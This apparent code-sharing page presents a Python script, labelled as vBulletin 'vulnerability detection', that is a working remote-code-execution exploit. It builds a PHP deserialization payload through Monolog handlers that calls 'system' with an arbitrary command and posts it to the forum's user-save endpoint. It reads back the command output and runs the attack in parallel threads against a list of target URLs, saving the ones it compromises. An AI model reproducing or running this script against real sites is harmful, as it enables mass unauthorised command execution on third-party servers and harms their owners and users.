Using Multithreading to Speed Up vBulletin RCE Vulnerability Detection
{ "title": "Using Multithreading to Speed Up vBulletin RCE Vulnerability Detection", "description": "This code uses multithreading to speed up vBulletin RCE vulnerability detection, which can effectively improve detection efficiency, and provides a detailed code implementation and usage instructions.", "keywords": "vBulletin RCE, vulnerability detection, multithreading, Python, code", "content": "import\x20random\nimport\x20re\nimport\x20requests\nimport\x20string\nimport\x20sys\nimport\x20threading\n\ndef\x20exploit_vbulletin_rce(url:\x20str,\x20command:\x20str,\x20proxy:\x20str\x20=\x20None)\x20->\x20bool:\n\x20\x20def\x20random_string(length):\n\x20\x20\x20\x20return\x20''.join(random.choice(string.ascii_letters)\x20for\x20_\x20in\x20range(length))\n\n\x20\x20session\x20=\x20requests.Session()\n\n\x20\x20if\x20proxy:\n\x20\x20\x20\x20session.proxies\x20=\x20proxy\n\n\x20\x20marker\x20=\x20"RANDOM_MARKER"\n\x20\x20command\x20=\x20f"echo\x20{marker}::;\x20{command};\x20echo\x20::{marker}"\n\x20\x20command\x20=\x20command.encode()\n\x20\x20payload\x20=\x20(\n\x20\x20\x20\x20b'a:2:{i:0;O:27:"googlelogin_vendor_autoload":0:{}i:1;O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"\x00*\x00handler";r:4;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:[LEN]:"[COMMAND]";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}}'\n\x20\x20)\n\x20\x20payload\x20=\x20payload.replace(b"[LEN]",\x20str(len(command)).encode())\n\x20\x20payload\x20=\x20payload.replace(b"[COMMAND]",\x20command)\n\n\x20\x20response\x20=\x20session.post(\n\x20\x20\x20\x20url\x20+\x20"/ajax/api/user/save",\n\x20\x20\x20\x20{\n\x20\x20\x20\x20\x20\x20"adminoptions":\x20"",\n\x20\x20\x20\x20\x20\x20"options":\x20"",\n\x20\x20\x20\x20\x20\x20"password":\x20random_string(10),\n\x20\x20\x20\x20\x20\x20"securitytoken":\x20random_string(10),\n\x20\x20\x20\x20\x20\x20"user[email]":\x20"pown@pown.net",\n\x20\x20\x20\x20\x20\x20"user[password]":\x20"password",\n\x20\x20\x20\x20\x20\x20"user[searchprefs]":\x20payload,\n\x20\x20\x20\x20\x20\x20"user[username]":\x20random_string(10),\n\x20\x20\x20\x20\x20\x20"userfield":\x20"",\n\x20\x20\x20\x20\x20\x20"userid":\x20"0",\n\x20\x20\x20\x20},\n\x20\x20\x20\x20verify=False\n\x20\x20)\n\n\x20\x20if\x20response.status_code\x20!=\x20200:\n\x20\x20\x20\x20print(f"Exploit\x20failed:\x20unexpected\x20response\x20code\x20({response.status_code})")\n\x20\x20\x20\x20return\x20False\n\n\x20\x20result\x20=\x20re.search(fr"{marker}::(.)::{marker}",\x20response.text,\x20re.S)\n\x20\x20if\x20not\x20result:\n\x20\x20\x20\x20print("Exploit\x20potentially\x20failed:\x20command\x20output\x20not\x20found")\n\x20\x20\x20\x20return\x20False\n\n\x20\x20print("Exploit\x20succeeded!")\n\x20\x20print("-"\x20\x2080)\n\x20\x20print(result.group(1))\n\x20\x20print("-"\x20*\x2080)\n\n\x20\x20return\x20True\n\n\ndef\x20check_url(url,\x20command,\x20output_file):\n\x20\x20print(f"Checking\x20{url}")\n\x20\x20if\x20exploit_vbulletin_rce(url,\x20command):\n\x20\x20\x20\x20with\x20open(output_file,\x20'a')\x20as\x20out_file:\n\x20\x20\x20\x20\x20\x20out_file.write(url\x20+\x20'\n')\n\n\ndef\x20check_urls_from_file(input_file,\x20output_file,\x20command):\n\x20\x20with\x20open(input_file,\x20'r')\x20as\x20file:\n\x20\x20\x20\x20urls\x20=\x20file.readlines()\n\n\x20\x20threads\x20=\x20[]\n\x20\x20for\x20url\x20in\x20urls:\n\x20\x20\x20\x20url\x20=\x20url.strip()\n\x20\x20\x20\x20t\x20=\x20threading.Thread(target=check_url,\x20args=(url,\x20command,\x20output_file))\n\x20\x20\x20\x20threads.append(t)\n\x20\x20\x20\x20t.start()\n\n\x20\x20for\x20thread\x20in\x20threads:\n\x20\x20\x20\x20thread.join()\n\n\nif\x20__name__\x20==\x20"main":\n\x20\x20if\x20len(sys.argv)\x20!=\x203:\n\x20\x20\x20\x20print("Usage:\x20python\x20exp.py\x20-f\x20<input_file>")\n\x20\x20\x20\x20sys.exit(1)\n\n\x20\x20if\x20sys.argv[1]\x20==\x20"-f":\n\x20\x20\x20\x20input_file\x20=\x20sys.argv[2]\n\x20\x20\x20\x20command\x20=\x20"your_command_here"\x20#\x20Replace\x20this\x20with\x20the\x20command\x20you\x20want\x20to\x20execute\n\x20\x20\x20\x20output_file\x20=\x20"velout.txt"\n\x20\x20\x20\x20check_urls_from_file(input_file,\x20output_file,\x20command)\n\x20\x20else:\n\x20\x20\x20\x20print("Invalid\x20argument.\x20Use\x20-f\x20for\x20file\x20input.")\n\x20\x20\x20\x20sys.exit(1)
Original URL: https://www.cveoy.top/t/topic/p3A6 Copyright belongs to the author. Do not reprint or scrape!